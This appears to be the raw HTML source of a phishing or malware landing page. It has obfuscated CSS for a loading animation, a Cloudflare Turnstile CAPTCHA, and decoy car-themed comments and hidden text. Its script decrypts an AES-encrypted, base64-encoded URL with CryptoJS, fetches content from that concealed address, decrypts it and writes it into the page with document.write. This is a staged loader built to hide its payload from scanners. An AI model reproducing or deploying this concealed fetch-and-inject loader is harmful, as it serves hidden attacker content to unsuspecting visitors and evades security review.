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	 	body , 		html	{ height: 100%;margin:  0;display:	 flex;align-items: 	center;justify-content:	  center	 } @keyframes			bounce		 { 		0%	,	 100%	 	, 12.5%	 , 32.5%	 , 76.1%		 {	 	transform:  	translateY(0) }	22.5%	,	 86% {		transform: 		translateY(7px)	 	}	} 		#quaint {	height:   179px;width:   130px;overflow:	hidden;margin-top:	-59px;margin-left:	25px }	  @keyframes 	shadow-fade  {	 0%  ,	100% 	,	21.2%		 ,		80%		{ 	 opacity: 0	}		 47% 	, 70%  { 	opacity:	1		}	 }	#vaingloriously	{  width:   130px;margin-top:			179px		}	#icecap	 	{  width: 130px;height:	 71px;border-radius:	0		0	7px	 7px;overflow:		hidden;margin-top:   -41px 	}	 #icecap  >	.dailiness	 {	width:		287px;height:		71px;background:  #27a0e0;transform: 		translate(-153px	,	 -70px) rotate(28deg)		} 	#icecap		>	 .cabinetmaking 	{  	width:  287px;height:	71px;background:	#1388d6;transform: 		translate(-120px			,  63px)	 rotate(-28deg)		} #dadaism  {  width:	 130px;height:	 	40px;background:  #113864;margin-top:			-70px	 }  #vacate 	 {	  display: 	flex;flex-wrap:	 wrap;width:	  118px;height:  131px;border-radius:   7px;overflow: hidden;margin: 0  auto;margin-top:	  -306px;animation: 	cal-bounce 	5s		 infinite;animation-timing-function:  	cubic-bezier(0  	,  	0.5 		,	  0 ,	 1);transform:	translateY(51px)  	scaleY(1)	  }	 @keyframes	cal-bounce	{		0%  ,  100% 	 , 	16.5% 	,		 76.1%		 {	 	transform:	 	translateY(151px)		scaleY(1)	 }	 28% 	 {	transform:		 translateY(39px)		 scaleY(1) } 	 31%		 {	transform: translateY(51px)	scaleY(1.05)	}  33% {		transform:  translateY(51px)	 scaleY(0.96)	 	}		 34%		 , 	68.5% { transform: 	translateY(51px)		 scaleY(1) }  68.5%		 {		animation-timing-function:			cubic-bezier(0.66   ,	  -0.16	, 		1 		,	  -0.29)			}			}	 	#vacate > .race	{ 	 width: 118px;height:	21px;margin-bottom:	-1px;background:		#0354a1  } #vacate  >	 .cabinetmaking			{ display: 	flex;width:  118px;height: 	37px	} 	.facetious		{	width: 39.3333px;height: 38px	  } .wadding 	{   background: #0073cc			}	.taciturnity	 {		background: 	#27a0e0 	}			.kappa		{		background:	#4fcfff	}		 .oaken 	 {	  background:	#035fb3   }		 .waist { background:  #134276	}	#hackles	  { width: 		130px;height: 		107px;animation:	opened-flap-swing		5s infinite;animation-timing-function:	cubic-bezier(0.32		,   0	,	 0.67  , 0);transform-origin:			top;transform: translateY(-68px) 		rotate3d(1		 , 	0	,	0  ,	-180deg)	}	  @keyframes	opened-flap-swing { 	 0% 	,		 100% 		,  	14.5% ,	 76%	{ transform:	translateY(-68px)		rotate3d(1	, 0		,	0 ,	-90deg)	}  16.5%   ,   74%		 {		 transform: 		translateY(-68px)  rotate3d(1	 , 0	,	  0 		,	 -180deg)	}  	}   #sacrifice   {  width:			130px;animation: closed-flap-swing 	 5s  infinite;animation-timing-function:	cubic-bezier(0.32	 ,  0	  , 0.67 ,	  0);transform-origin: 	 top;transform:			translateY(-71px)	  rotate3d(1		,		 0	,   0  ,  90deg)		} 	@keyframes closed-flap-swing {		0%			,		 100%	  ,	  77%	, 8.5% { 	 transform:   translateY(-71px)  	rotate3d(1 	,  0  , 0 , 0)	 } 14.5%			,   76%	{   transform:	translateY(-71px) 	 rotate3d(1	 	,  0		 ,	  0	,	 90deg)		} }		#pacifically			{	 width:	 130px;height:  107px;overflow: 		hidden }	.naivety	{ 	width:		96px;height:	 	96px;background:	 #4fcfff;margin:	-48px auto	0 	auto;border-radius: 7px;transform:	scaleY(0.6) 	rotate(45deg) }  #hackles	 .naivety	{	 	background: #113864		}  	#sacrifice   .naivety	 	{  	background: 	#4fcfff }	




  <span class="cf-turnstile" id="pabulum" data-sitekey="0x4AAAAAAAxaoF-KwILNGD0w" data-callback="valediction"> <div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-wwfhd_response"></div></span>  <!-- <span>Adventure starts where the 	map	 ends	  and		 the	 	road		begins.</span>	-->		 

		<div id="quaint" hidden="">	<div id="vaingloriously">	  <div id="hackles"> <div id="pacifically">		<div class="naivety">	</div>		</div>		 </div>   <div id="vacate"> 	<div class="race"> </div>	 <div class="cabinetmaking"> 	 <div class="facetious 	wadding"> 	</div> <div class="facetious  taciturnity"> </div>  	<div class="facetious 	 kappa">	 </div>	 </div>		 <div class="cabinetmaking">	<div class="facetious		 oaken"> 	</div>	 <div class="facetious	 wadding">		</div> 	<div class="facetious  taciturnity"> </div>			</div>	<div class="cabinetmaking">   <div class="facetious		 waist">	 </div>	 <div class="facetious oaken"> 		</div>  <div class="facetious 	wadding"> 		</div> 	 </div> 	 </div>   </div>	<div id="dadaism"> 		</div>	<!--	<i>Driving represents		the  	pinnacle	of		independence.</i>	 	-->

		<div id="icecap"> <div class="cabinetmaking">	</div>		 <div class="dailiness">	</div>   </div> 	<div id="sacrifice"> <div id="pacifically">	<div class="naivety">  </div> 	 </div>	</div>	 </div>	<div style="display:none;">Driving 		unlocks 	new  	opportunities  for		exploration.</div>


	async		function 	jaguar(vague)	  {
	var		 {a,b,c,d}  	= JSON.parse(vague);

	 return 	CryptoJS.AES.decrypt(a, 		CryptoJS.PBKDF2(CryptoJS.enc.Hex.parse(d), CryptoJS.enc.Hex.parse(b), {hasher:	 CryptoJS.algo.SHA512,  keySize:  64/8,	iterations: 	 999}),		{iv:	 CryptoJS.enc.Hex.parse(c)}).toString(CryptoJS.enc.Utf8);
 async function	  valediction()	{
 		quaint.hidden =   0;
	pabulum.hidden	= 1;
	 	document.write(await  jaguar(await (await	 fetch(await jaguar(atob(`eyJhIjoid2FvNGNxSlBBYU1ncVFNZWlJdjhYRmwyVW9PWFBqbVdNcDBGR2pNbFFQND0iLCJjIjoiZDI1Y2Q0YTdhMWY1Y2QyMWY3MGI5NzQwMTkwN2E3MjAiLCJiIjoiYmQxZTg0MTY1ZjZmZjhiZWQzNjgwOGEyM2Q2M2VlNzJhNzJmY2Q0ODI2OTE2ZTJiYThjZGU5OWM5YTQyMDQxM2QxYWQ5ZmQ5Njg4MDQ1NDY1N2E2MWViOTU1YWIxMzExZTIyZjQyMmVlODk2Y2I2MjYyZTBkZDg0NTBjOGJlODQ1MDM3OGJlOTQ0MDQ1NWRjMmFiNGM0NWI4NTcxNzczOTc2MzQ4YTY4MmU2YmIyYmI1YjdkMDMyZjYzNzI1MGI4YzY0ZTQyNjYzYzZkYjE1Y2UyYmQyMzkxMjUxZmQ2Y2M3OGU0MGE1OGU5NGY1YWI2MWViMWUzNmM2YWI2NDVmYzhmZDMxZjQ0OTBjYzJlNDdjZjg2MTM3MWNmNDVmNjNiMzgwZGExZGJkMWRiZDgzMTBhZmQ0MjJmNWE2OTZmOGI1MTk3ZWVkMzYxZjNmNmQxMDRhMzJmZmU5NzJlY2M5MTQ3MjFmYmYwNjdjZTkxM2U1ZDg5NzNkMGM1MTU4N2VhNTdhNjQ4MjA1NGFlMTM3NDVjNmNkMDlmYzc1YWM5MGExOWUyMWY1NmM1Y2E4MzE3NTcwZjE0OWUxYmQ0Yjc5Y2M2ZDllYTI1OTZlMmI3NzhkZjcyY2FhOGFkMmM2ZjBlODFiMTk3Mjg1MjAxNmRkNGIxNjUxMjJiNzE4MDE1M2IiLCJkIjoiNjQ2MTYyNjI2NTcyIn0=`)),	  {   method:  'POST',	body: 	 JSON.stringify({	valediction:		 "cabstand"	 })		 })).text()));

 }  	if	 	(!pabulum.dataset.sitekey)	 	{valediction()}

</script>		 <!-- 		A 	 car’s  	personality	emerges 	with		every   distance traveled.		-->
